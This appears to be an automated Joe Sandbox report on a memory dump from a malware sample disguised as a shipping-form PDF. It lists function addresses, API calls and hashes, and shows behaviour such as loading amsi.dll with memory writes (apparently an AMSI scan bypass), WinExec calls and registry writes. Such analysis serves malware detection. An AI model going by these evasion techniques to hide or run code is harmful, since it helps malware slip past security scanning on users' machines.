                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID: 0`
                                                                                          • API String ID: 3472027048-3339448193
                                                                                          • Opcode ID: 26788b04ec07da1657ad7b4d9e6c0e801537dd16a348be90aac3fbfa58bdb7db
                                                                                          • Instruction ID: bc9a6252f47ff04056dc07cb361e63da942029a31467d18635c5d0ca6bf887ef
                                                                                          • Opcode Fuzzy Hash: 26788b04ec07da1657ad7b4d9e6c0e801537dd16a348be90aac3fbfa58bdb7db
                                                                                          • Instruction Fuzzy Hash: 7251F3716053408FE716CF6CC9847A6BBE4EF85324F1885AEE44DCB2A6E770D845CBA1
                                                                                          Function 0294870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(amsi), ref: 02948715
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                            • Part of subcall function 02947D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D74
                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02948774
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                          • String ID: DllGetClassObject$W$amsi
                                                                                          • API String ID: 941070894-2671292670
                                                                                          • Opcode ID: 97df2ccb7e3b147aec2c85de4b6a207f16ac56095c6ab95e2efb235941fa4354
                                                                                          • Instruction ID: 6ab1fce4646095b4c23fcb51a9593c05c2fbba14737d20daecae2f9cc4773504
                                                                                          • Opcode Fuzzy Hash: 97df2ccb7e3b147aec2c85de4b6a207f16ac56095c6ab95e2efb235941fa4354
                                                                                          • Instruction Fuzzy Hash: BEF0A46110C38179E201E6B48C45F4FBFCD4BD2228F448A5CF1E8562D2DA75D1058BB7
                                                                                          Function 0294E2F6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0294E436
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckConnectionInternet
                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                          • API String ID: 3847983778-3852638603
                                                                                          • Opcode ID: 2604ca15854f546ffc7c2fee415236a2107668ab50f5630800ca1305601d0323
                                                                                          • Instruction ID: 5c95d366f804bf2dfe37145986bb999e7a55668934b18bca980e9874cae2165d
                                                                                          • Opcode Fuzzy Hash: 2604ca15854f546ffc7c2fee415236a2107668ab50f5630800ca1305601d0323
                                                                                          • Instruction Fuzzy Hash: AA410E71B501089BEB12EBA4DC41E9EB3FAFFCC724F625425E085A7240DE74AD018F65
                                                                                          Function 0294840E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • WinExec.KERNEL32(?,?), ref: 02948478
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                          • String ID: Kernel32$WinExec
                                                                                          • API String ID: 2292790416-3609268280
                                                                                          • Opcode ID: 4d7343aa0a8e38fbb16ac83f7a9d7e3ae2d6fa551a88d91544d88e300284a97c
                                                                                          • Instruction ID: 96c2901e47a4cd387a86ba0c0c245106b122b3e8ac763190cf1a06c2fb99cfa3
                                                                                          • Opcode Fuzzy Hash: 4d7343aa0a8e38fbb16ac83f7a9d7e3ae2d6fa551a88d91544d88e300284a97c
                                                                                          • Instruction Fuzzy Hash: 63018135644304BFEB11EFB8DC02F6A77EDF788710F928420F508D3680DA74AD008A24
                                                                                          Function 02948410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • WinExec.KERNEL32(?,?), ref: 02948478
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                          • String ID: Kernel32$WinExec
                                                                                          • API String ID: 2292790416-3609268280
                                                                                          • Opcode ID: 2928fd46b9e25269f7606a3042ce174e6bd42c0b7a089c0cfd06bedf8b179690
                                                                                          • Instruction ID: f51e90220562ce06d80e6daf24f348b5b883dbd2c0c8dc78516d59436af886b2
                                                                                          • Opcode Fuzzy Hash: 2928fd46b9e25269f7606a3042ce174e6bd42c0b7a089c0cfd06bedf8b179690
                                                                                          • Instruction Fuzzy Hash: CCF08135644304BFEB11EFB8DC02F5A77EDF788710F928420F508D3680DA74A9008A24
                                                                                          Function 02945BB4 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02945CFC,?,?,02943888,00000001), ref: 02945C10
                                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02945CFC,?,?,02943888,00000001), ref: 02945C3E
                                                                                            • Part of subcall function 02937D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02943888,02945C7E,00000000,02945CFC,?,?,02943888), ref: 02937D66
                                                                                            • Part of subcall function 02937F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02943888,02945C99,00000000,02945CFC,?,?,02943888,00000001), ref: 02937F3F
                                                                                          • GetLastError.KERNEL32(00000000,02945CFC,?,?,02943888,00000001), ref: 02945CA3
                                                                                            • Part of subcall function 0293A700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0293C361,00000000,0293C3BB), ref: 0293A71F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                          • String ID:
                                                                                          • API String ID: 503785936-0
                                                                                          • Opcode ID: ee2343e0ee3ed9ff59753f6cd613913ee78835ffe82605b7f723cb2c79dd896c
                                                                                          • Instruction ID: 759fda0ffc6cb806431faac577b3a8f429fa2aa1d5093e2eb56f4fc80838e72f
                                                                                          • Opcode Fuzzy Hash: ee2343e0ee3ed9ff59753f6cd613913ee78835ffe82605b7f723cb2c79dd896c
                                                                                          • Instruction Fuzzy Hash: 8C318375E042089FEB01EFA4C880BAEB7F6AF88714F918465E904E7380DB755A05CFA5
                                                                                          Function 0294E6BE Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02A85914), ref: 0294E704
                                                                                          • RegSetValueExA.ADVAPI32(0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,0294E76F), ref: 0294E73C
                                                                                          • RegCloseKey.ADVAPI32(0000088C,0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,0294E76F), ref: 0294E747
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenValue
                                                                                          • String ID:
                                                                                          • API String ID: 779948276-0
                                                                                          • Opcode ID: 273d7ec34af3bd57c3c0ed94b78d38fb3bbf3b2b060a7fbafbbb9a363f9a68f6
                                                                                          • Instruction ID: 3754e7a51ba33c1ad71b2bf2cd6d6ca27b09ee74668a5e48b0147210ab46277a
                                                                                          • Opcode Fuzzy Hash: 273d7ec34af3bd57c3c0ed94b78d38fb3bbf3b2b060a7fbafbbb9a363f9a68f6
                                                                                          • Instruction Fuzzy Hash: 04110A71A50204BFEB01EBA8DC81D6A7BEDEB89720F924470B944D7250DA34EE41CE65
                                                                                          Function 0294E6C0 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02A85914), ref: 0294E704
                                                                                          • RegSetValueExA.ADVAPI32(0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,0294E76F), ref: 0294E73C
                                                                                          • RegCloseKey.ADVAPI32(0000088C,0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,0294E76F), ref: 0294E747
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenValue
                                                                                          • String ID:
                                                                                          • API String ID: 779948276-0
                                                                                          • Opcode ID: 82687791306bd17fd136ff1a03ba8db0f2e89d0209d88527df07b9be64085555
                                                                                          • Instruction ID: 15823b069392a3abd8d8438b7fce8763a3a9568411271eb5ed5fac1ad5f6365c
                                                                                          • Opcode Fuzzy Hash: 82687791306bd17fd136ff1a03ba8db0f2e89d0209d88527df07b9be64085555
                                                                                          • Instruction Fuzzy Hash: A6110A71A50204AFEB01EBA8DC81D6A7BEDEB89720F924470B944D7250DA34EA41CE65
                                                                                          Function 0293E2EC Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: a791192206e26a12b107f7f6526f0e82e6af334af5aa42b93d7c54e3db2b97b7
                                                                                          • Instruction ID: 781a6c5647ca3ba5f7e88466c1cbd4048b261bfbad989fa77cc46462abc8d2b5
                                                                                          • Opcode Fuzzy Hash: a791192206e26a12b107f7f6526f0e82e6af334af5aa42b93d7c54e3db2b97b7
                                                                                          • Instruction Fuzzy Hash: F5F0962470421086D7277B39D9C4A7D279EAFC5710B505836F4C6AB245CB34EC45CB63
                                                                                          Function 02934CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SysFreeString.OLEAUT32(0294E950), ref: 02934C1A
                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 02934D07
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02934D19
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$Free$Alloc
                                                                                          • String ID:
                                                                                          • API String ID: 986138563-0
                                                                                          • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                          • Instruction ID: a9a1a68a9aad51483da87d1bfcb91dae3877a6cd53fb48b50f3c20ac24f32db8
                                                                                          • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                          • Instruction Fuzzy Hash: 4AE017B82052016EFF1B2F219C40B7B372EBFC2741B259899E804CA160DB78C841AE34
                                                                                          Function 02947064 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SysFreeString.OLEAUT32(?), ref: 02947362
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeString
                                                                                          • String ID: H
                                                                                          • API String ID: 3341692771-2852464175
                                                                                          • Opcode ID: b5aab33786c1be42d0a1b9c2b5bce3744d729d95a8fdaab34869a4d242b755a9
                                                                                          • Instruction ID: cb8f6cdd66459033a68602365a20534bc252995cfc1b663ad900243a3dbcb0da
                                                                                          • Opcode Fuzzy Hash: b5aab33786c1be42d0a1b9c2b5bce3744d729d95a8fdaab34869a4d242b755a9
                                                                                          • Instruction Fuzzy Hash: D5B1F074A016089FDB15CF99E880AADFBF6FF89314F258569E805AB360DB30A845CF50
                                                                                          Function 02948824 Relevance: 3.1, APIs: 2, Instructions: 65libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0294890B), ref: 02948858
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                            • Part of subcall function 02947D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D74
                                                                                          • FreeLibrary.KERNEL32(74AE0000,00000000,02991388,Function_000065D8,00000004,02991398,02991388,05F5E0FF,00000040,0299139C,74AE0000,00000000,00000000,00000000,00000000,0294890B), ref: 029488EB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3283153180-0
                                                                                          • Opcode ID: 14d2218aa810634ae143663c53431f3cc9caa13561a46ad73c7a571a4283e747
                                                                                          • Instruction ID: e6edecd4ae6e34074b6351a199a05ffefb088af0b66668b0624d4ac9f4ad5027
                                                                                          • Opcode Fuzzy Hash: 14d2218aa810634ae143663c53431f3cc9caa13561a46ad73c7a571a4283e747
                                                                                          • Instruction Fuzzy Hash: 1C114F70A40305ABFF02FBA8DC02E6E77B9FBC5720F5105A5B108A7A80DE34AD009B54
                                                                                          Function 0293E6E8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 0293E709
                                                                                            • Part of subcall function 0293E2EC: VariantClear.OLEAUT32(?), ref: 0293E2FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCopy
                                                                                          • String ID:
                                                                                          • API String ID: 274517740-0
                                                                                          • Opcode ID: a88c10efcd1cb811fe0cf5c8d2898241b2996628eab15d01995c7005d3b3c775
                                                                                          • Instruction ID: ee73fe86e2ec452c56e757098fe35e7c0d3126d2077b00a4da48c72bb30dc613
                                                                                          • Opcode Fuzzy Hash: a88c10efcd1cb811fe0cf5c8d2898241b2996628eab15d01995c7005d3b3c775
                                                                                          • Instruction Fuzzy Hash: E311A12171431487CB23AF29CDC5A6B77DAEFC57507059826BACBCB255DB30CC41CAA2
                                                                                          Function 029315CC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02931A03,?,02932000), ref: 029315E2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
